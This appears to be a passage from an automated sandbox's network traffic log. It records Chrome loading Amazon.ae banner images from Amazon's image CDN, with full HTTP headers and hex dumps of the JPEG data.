                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC1378INData Raw: fe 64 4c 02 aa d0 06 55 61 27 91 a7 b7 ac 0d 7e 00 d4 dd db 03 84 d5 87 64 cf ea 1c d6 c3 b1 3e 2e 1b dc 2d 1a 3b de fa 69 92 1c d8 2f ec 51 36 b3 49 86 36 8b af 77 5e a8 3e cc bc d8 fa 42 84 e1 14 6f a4 5b 16 51 55 78 f5 e6 c3 3d 59 3c ae 6d 6f 45 5e fa ff 00 20 95 ed f1 f8 e9 02 f2 3d 55 f9 0f f3 ba 00 fb 4c c6 cd 38 14 9a ec 85 7e 86 88 f5 33 c2 97 a3 36 53 be 7a d8 94 fe 4b e0 06 7e 19 4f 46 9f 9d a7 e7 63 e6 52 8e ae f9 d9 4f c4 75 4a fc d0 06 d9 69 c9 17 be c4 9b 34 ae 60 27 dc 70 95 24 47 a3 d6 77 41 2d 9f 3d fc 16 0b 28 d3 dc 17 63 72 a0 a0 4d fe b9 77 4b 25 68 89 a9 c0 e6 1c 35 aa 32 e7 53 fd 1e 89 a9 19 d9 1f 14 09 69 36 bc 14 8a 70 15 92 a1 c0 ed bf 8b 3f 4a ff 00 55 c7 19 77 be 06 74 b1 e9 7f d2 c8 75 17 91 f8 af 89 2f 60 34 8e f7 37 24 c4 10
                                                                                                                                                                                                                                                                Data Ascii: dLUa'~d>.-;i/Q6I6w^>Bo[QUx=Y<moE^ =UL8~36SzK~OFcROuJi4`'p$GwA-=(crMwK%h52Si6p?JUwtu/`47$
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC1311INData Raw: 66 8d 25 24 bf 34 d6 08 23 ee ba 95 d9 8d 39 0b 9f cc 3d 00 25 26 33 be ca 03 e8 7e e2 8f eb e3 c0 f8 33 54 9f 65 c1 16 7e f6 41 39 21 59 93 52 5a 50 1a ab 44 4d b0 df 18 0d 44 d4 a2 c7 42 ee 31 1a 41 b3 be 60 50 85 62 bb a8 a1 6b e2 c5 9d 08 84 b4 e7 e2 9f 4d dd 87 9c 5b 51 65 b8 6d 07 90 99 60 7c f7 c3 07 a3 f9 65 41 44 46 90 b7 7a 42 02 72 e8 75 76 c0 d1 f4 b0 68 a2 34 e1 4c e5 c8 e5 ff 00 4a 39 31 1e 6f 46 1e 6f 47 f5 1e 47 d3 fa 80 d5 9c d9 a7 ea aa b6 86 5e 13 42 51 5a 19 90 5b 53 7c d8 81 95 a6 21 a4 88 d2 6b c4 3a 17 68 85 17 bc 4f 3f bf 8f 8e 61 a3 1b f4 7f 08 c5 e7 e4 d1 06 00 2c 5d 11 51 84 96 f9 08 9a 29 7f 08 cf 41 e9 79 3c 2a a3 d4 2f 70 8f 5f 38 a3 9b a3 18 40 7f 6b 62 0d 1d 3e 04 0b 3a 52 c0 f3 f2 27 cf 15 fd ec a3 b9 8b 7f a5 98 67 88 8c
                                                                                                                                                                                                                                                                Data Ascii: f%$4#9=%&3~3Te~A9!YRZPDMDB1A`PbkM[Qem`|eADFzBruvh4LJ91oFoGG^BQZ[S|!k:hO?a,]Q)Ay<*/p_8@kb>:R'g


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                138192.168.2.450018151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC716OUTGET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07ns817nh_379x304_ae-en._SY116_CB623271885_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 4343
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: f31cae38-6f9a-40a8-9bb0-d59216863e6f
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Mon, 11 Apr 2022 11:01:53 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Tue, 01 Sep 2043 08:35:26 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 1313816
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:43 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kiad7000151-IAD, cache-nyc-kteb1890035-NYC
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 91 03 01 22 00 02 11 01 03 11 01 ff c4 00 a0 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 07 00 03 04 05 06 08 01 02 10 00 02 01 03 03 00 06 02 0d 07 09 08 03 00 00 00 01 02 03 00 04 11 05 12 21 06 13 22 31 41 51 32 74 07 14 15 23 61 71 73 81 91 a1 b2 b3 c1 25 52 72 83 93
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!"1AQ2t#aqs%Rr
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC1378INData Raw: a3 91 27 70 51 b7 77 a2 70 38 a1 2d d8 ec b9 f8 0d 6d 8d da e4 c3 34 93 e0 f7 43 e5 ff 00 53 f8 ad 6c a3 84 81 bb e0 ac 7e 88 3d f3 f5 7f 88 ad f5 af 64 29 f2 e6 b3 d4 f7 34 c3 d4 8e c8 00 1c f3 4e 07 07 e6 a6 9c 83 dc 2b e1 0f 78 a9 36 55 21 ee b6 95 35 ba 95 76 41 c4 e8 42 77 6c 3e 61 fe c9 a0 cf 41 87 e5 7d 4b d4 ed fe f1 a8 b7 67 36 fc 8f 10 4f cd b9 18 8f a4 0c d0 9f a1 23 1a c6 a3 ea 56 ff 00 78 d5 e8 3d 18 3b 46 97 59 fe bd e8 df e8 6a 7f 76 b5 73 a8 21 da 0e 38 24 d4 3d 4e c2 79 f5 6d 12 e6 34 cc 56 cb 7d d6 be 40 d9 d6 a2 aa 70 4e 4e e3 54 8b fd 7d ae 7a a6 9d ff 00 b2 a7 ab 8f bb 1c c9 ec c2 ff 00 ed 77 4b fd d0 7d a7 ae 7a 35 d0 7e cc 1c 5f 5c fa a7 e2 f5 cf 84 51 a5 ea ce a9 b4 79 4b 00 d2 a5 55 26 79 d5 af 95 49 86 e6 58 31 d5 48 e9 8f cd 76
                                                                                                                                                                                                                                                                Data Ascii: 'pQwp8-m4CSl~=d)4N+x6U!5vABwl>aA}Kg6O#Vx=;FYjvs!8$=Nym4V}@pNNT}zwK}z5~_\QyKU&yIX1Hv
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC1378INData Raw: be 7d c8 8f f3 be b8 e9 53 65 12 7f 08 6a 76 00 54 4e 87 cb 8d 6b 53 3f dc a0 fb d3 4d 4f 36 2a 17 45 e4 ea f5 4d 55 bc ac 61 fb d3 5a 64 f8 21 05 fa 37 ba bf 49 0d 94 53 c8 a3 76 c4 6f 84 03 e0 5b c7 00 f2 68 7d d0 7e 99 5d dd de 2c 73 ca 65 49 bc f1 9f 20 dc 91 b7 eb 2e b8 c0 e4 57 cd b6 ad 1d c5 d4 a2 62 02 63 b4 4f 20 06 21 49 23 9c 80 3b e8 b9 66 ba 65 94 52 ef 85 13 2a c7 74 71 22 82 bb 7b b2 a0 1c 6d 15 9e ee 4e f7 2b 2a 7a 04 5d 3d d4 e2 b9 be 98 c4 19 ba 8b 62 a4 e3 87 29 bd ce d3 e2 39 c6 7b b8 35 06 de ce 2b c5 e5 dd 72 07 2a 01 ad a6 93 a0 69 1d 21 8c 4d 3c 7b e5 bd 46 0d 22 ca 63 71 b8 60 b0 00 81 9c 0c e7 04 f9 e4 e6 87 3d 1f ba 2c 02 e7 76 d2 46 7c f6 f1 51 95 08 b9 39 cb b2 d0 ad 51 2c 6e 10 6d bd 8d 21 d5 6d 92 56 bc 95 04 a0 f6 42 29 23
                                                                                                                                                                                                                                                                Data Ascii: }SejvTNkS?MO6*EMUaZd!7ISvo[h}~],seI .WbcO !I#;feR*tq"{mN+*z]=b)9{5+r*i!M<{F"cq`=,vF|Q9Q,nm!mVB)#
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC209INData Raw: f8 ec d1 53 40 f6 fe 35 4b 89 42 8c 0d c3 81 c0 e4 02 69 cb 58 16 52 77 78 52 a5 5e fd 59 b5 e2 5d 3e 6c 8f 3e 11 4e ad 99 68 b6 f1 05 ce c1 f3 8c d5 a5 b6 91 6f 76 4a 15 d9 c7 a4 9d 93 f4 72 bf 55 2a 55 e3 d2 f2 6a fc b1 fd 33 65 4a 71 c5 f0 62 b3 5e 31 a5 4a be 8c f3 88 d2 54 16 3c d2 a5 5c 02 bf 52 3d 81 42 ae 97 f3 0a fc f4 a9 57 74 15 b3 5c 7b cf c7 5b 9e 83 f3 a9 c3 f2 73 fd 83 4a 95 43 b3 4f 46 db 58 62 1c 50 ab a4 9a 5c 5a b5 d5 9c 73 e4 61 64 01 95 8a 91 b8 a0 34 a9 51 3b a3 21 d2 8e 8e 43 a0 95 30 4b 23 96 0b e9 b0 6f f2 55 ad a7 45 25 61 6f a7 7f d5 14 a4 9f d7 48 29 52 ae 60 41 4f 27 ce 95 2a 55 c1 3f ff d9
                                                                                                                                                                                                                                                                Data Ascii: S@5KBiXRwxR^Y]>l>NhovJrU*Uj3eJqb^1JT<\R=BWt\{[sJCOFXbP\Zsad4Q;!C0K#oUE%aoH)R`AO'*U?


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                139192.168.2.450017151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC716OUTGET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07nsb535l_379x304_ae-en._SY116_CB623271922_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 3157
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 69bbbb5d-e882-4f95-9814-0dd6e845a40f
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Mon, 11 Apr 2022 11:01:52 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Sun, 27 Sep 2043 15:44:25 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 965470
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:43 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kcgs7200023-IAD, cache-nyc-kteb1890035-NYC
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 91 03 01 22 00 02 11 01 03 11 01 ff c4 00 95 00 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 03 00 04 05 06 01 02 07 08 10 00 02 01 03 01 04 07 04 06 08 03 09 00 00 00 00 01 02 03 00 04 11 12 05 21 31 41 06 51 61 71 81 91 a1 13 22 32 b1 14 52 72 82 b2 d1 07 15 24 33 73 92 a2
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1AQaq"2Rr$3s
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC1378INData Raw: 00 00 27 70 1b 87 1a a4 fc 74 96 3d 8b 1f 25 be e1 51 8a f2 07 d6 b6 32 e4 e4 8f 5c 1f 5a 16 8e d3 43 9a 54 81 75 ca ea 8b d6 c4 28 a9 f7 92 28 18 ae 7b 07 76 7f 3a 71 6f 18 04 15 90 83 ff 00 4b 10 7c 81 aa 85 c7 49 61 5c 88 10 ca 7a fe 04 f3 c6 af 41 55 fb cd af 79 76 b2 06 93 40 c1 f7 63 f7 7d 77 b1 f3 a6 59 98 7b 3a f7 eb 19 62 c8 0d 9f b7 83 59 5d b5 20 dc 63 0e 7a 97 20 fa e4 53 55 95 00 09 1c 78 45 00 0c 0a 20 d3 b9 71 f7 6a cb 2c 97 d3 3c 71 fa 87 5f ae 24 ff 00 96 6f fc 89 4a 9a fd 18 7f a2 29 56 fe 44 c5 f0 c4 8d 8b 62 99 86 17 5e 3a d7 dc f5 e2 2a 5e d7 a3 91 c5 c8 03 d6 73 2b 79 b1 ab 46 2b 15 78 f0 e2 b6 42 5c d9 bd 1c 0f f4 85 0a c1 b4 74 29 dd ec 61 aa 5e c2 71 f4 fe 24 62 27 de 06 ae 3a 47 bc bc d4 f3 1b 89 ae a1 d3 ee 8e 5e df dd b5 d4 71
                                                                                                                                                                                                                                                                Data Ascii: 'pt=%Q2\ZCTu(({v:qoK|Ia\zAUyv@c}wY{:bY] cz SUxE qj,<q_$oJ)VDb^:*^s+yF+xB\t)a^q$b':G^q
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC401INData Raw: 9a b2 ee 35 e9 3b 2b d1 79 0c 13 8f f8 b1 c6 df ce a1 8d 72 9d b1 b0 e5 da 73 ac f1 95 46 2a 03 92 09 d7 8d ca 7b c0 dc 7a c0 15 78 d8 30 49 65 69 05 bc 8c 19 a2 0c 35 01 81 82 c5 87 90 38 a9 61 c5 28 4e 4b e1 4c b9 14 e2 9f d2 d6 1a b7 e3 4c d1 e8 a1 ab a0 80 7c 52 a1 e4 52 a0 0c d6 08 a8 bb 6b b7 51 a6 63 ab a9 c0 c1 3f 69 46 ef 11 8c fd 51 52 51 ca b2 64 a3 06 c7 1c 1c e3 bf aa 96 39 63 2d 0d 2c 52 8e cc 14 a6 e6 2a 79 58 c6 69 85 23 de 11 4d 5e 1a 95 68 e8 66 31 45 05 90 72 5b 66 98 49 64 2a cc d1 d3 76 80 56 50 ca 45 42 6b 32 29 a9 8b 4f 2a b8 3d b9 34 ca 5b 5e ca ca 1b b1 51 bd 8f 55 b5 c0 3c e2 93 f0 9a 8d d8 03 54 52 7d bf ec 2a e1 3e cc 69 55 94 1f 88 30 f3 18 a8 9d 83 b0 ae 6d a3 71 70 a1 49 61 8c 30 6e 5d 99 a9 b8 be e9 8c a6 ba b1 d2 5b 93 52
                                                                                                                                                                                                                                                                Data Ascii: 5;+yrsF*{zx0Iei58a(NKLL|RRkQc?iFQRQd9c-,R*yXi#M^hf1Er[fId*vVPEBk2)O*=4[^QU<TR}*>iU0mqpIa0n][R


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                140192.168.2.450021151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC716OUTGET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b077n51cr2_379x304_ae-en._SY116_CB623271922_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC650INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 3783
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 9471e278-00a4-4f42-8db7-f1f15707d15a
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Mon, 11 Apr 2022 11:01:53 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Mon, 25 Jan 2044 07:19:39 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:43 GMT
                                                                                                                                                                                                                                                                Age: 595581
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kjyo7100034-IAD, cache-ewr18146-EWR
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 91 03 01 22 00 02 11 01 03 11 01 ff c4 00 96 00 00 00 07 01 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 04 05 06 07 08 01 09 10 00 02 01 03 02 03 04 06 06 05 09 07 05 00 00 00 01 02 03 00 04 11 05 21 06 12 31 13 32 51 61 22 41 71 91 a1 b1 07 14 42 72 81 d1 52 53 62 a2 c1 15 23
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!12Qa"AqBrRSb#
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC1378INData Raw: 94 75 05 77 17 5d 90 01 b9 91 43 65 88 4c b7 5a ed 3e 1b 44 6c b3 1f e8 a4 ce 44 c3 45 19 5d 8d 28 0d 31 48 45 aa 90 5b 95 47 4e d5 e2 4f 70 89 76 f3 c9 6a 56 7b cb 38 7a 5d 07 f2 58 dc fc 7b bf 1a c7 2d e9 e0 7a c3 7e 9b f5 62 89 a3 e9 ea dd f6 9e 67 5f 24 c4 51 13 ef 7a da ad e6 59 91 64 5c e1 b3 8c ec 76 25 7c eb 94 7e 96 6f 7e b7 c5 17 6a 3a 5a c1 6b 17 b9 3b 63 fb d2 1a b0 92 a4 bc 2b 21 dc 66 98 cb a6 44 41 ca 0a 97 88 51 a4 00 e0 78 9f 95 6d 15 81 c3 f0 b6 ec 82 9d 2e 89 07 a9 07 ba ac 21 45 2c 40 45 24 d0 56 57 4f 89 18 2a a8 f7 54 ef 05 d9 a5 df 12 e8 d0 74 54 ba 8d 8f b2 d5 4d c1 a8 c8 df 2c 6a f3 f4 2b 64 97 fa fc f3 4d dc b6 b2 b9 61 b1 38 69 9d 61 4d 97 2d d1 8d 07 54 26 9f 2b f6 6a 00 1c e0 bf 50 46 de 8e fb fa ce de 35 ed eb 76 32 f6 8f dd
                                                                                                                                                                                                                                                                Data Ascii: uw]CeLZ>DlDE](1HE[GNOpvjV{8z]X{-z~bg_$QzYd\v%|~o~j:Zk;c+!fDAQxm.!E,@E$VWO*TtTM,j+dMa8iaM-T&+jPF5v2
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC1027INData Raw: e6 9d a3 50 98 c1 3d d0 36 07 d5 b6 2b 9f da 7f b2 bb 58 54 ad 74 43 0c e2 e6 e3 2a c8 09 cb 3f 33 f9 97 6c 92 14 0e bb ee 3c b3 46 d5 2d 97 53 b5 8a 6f 4d 91 09 7e c8 92 85 94 9e f7 8e 42 f7 09 04 2a 1e 94 fe da d5 b5 96 cf 5b 54 7d ce 32 2e 9d 0e ea 37 03 b2 8c f5 fd 63 0c 77 41 a9 0d 53 53 b4 d3 ca a4 b2 66 52 46 ca 8e e5 41 f1 e5 04 64 f8 75 ad 57 2b eb f1 26 66 7d a9 3c 55 61 63 1f 0f 6b 0d 6d 12 80 fa 7d d1 0c 72 ee 08 46 3d 5b 24 10 45 71 9c 52 e0 83 5d df ab 5a da 41 a5 6b 08 e3 d3 7b 4b e1 1f ad 47 34 2d b5 70 24 04 f2 27 2e 32 40 c6 7a 57 5a d7 19 dd 4f 2d cd 1c 4f 9a 83 e7 9d 7b d1 7e 2a c1 bf 23 44 37 81 3b e0 af de 52 3f d2 b4 8b 18 96 9c 24 b5 5c 8e f9 1b ba e0 fb 0d 39 17 34 16 98 4a 80 d2 11 92 a0 e3 db ea a8 4d 1e e0 fd 5a 23 9e ab 43 eb
                                                                                                                                                                                                                                                                Data Ascii: P=6+XTtC*?3l<F-SoM~B*[T}2.7cwASSfRFAduW+&f}<Uackm}rF=[$EqR]ZAk{KG4-p$'.2@zWZO-O{~*#D7;R?$\94JMZ#C


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                141192.168.2.450019151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC716OUTGET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07yk48157_379x304_ae-en._SY116_CB623005781_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC652INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 3315
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: f88e6565-2009-4399-89d0-df1a4385583f
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Fri, 08 Apr 2022 09:49:46 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Sat, 16 Jul 2044 20:02:25 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:43 GMT
                                                                                                                                                                                                                                                                Age: 1659763
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kjyo7100044-IAD, cache-ewr18172-EWR
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
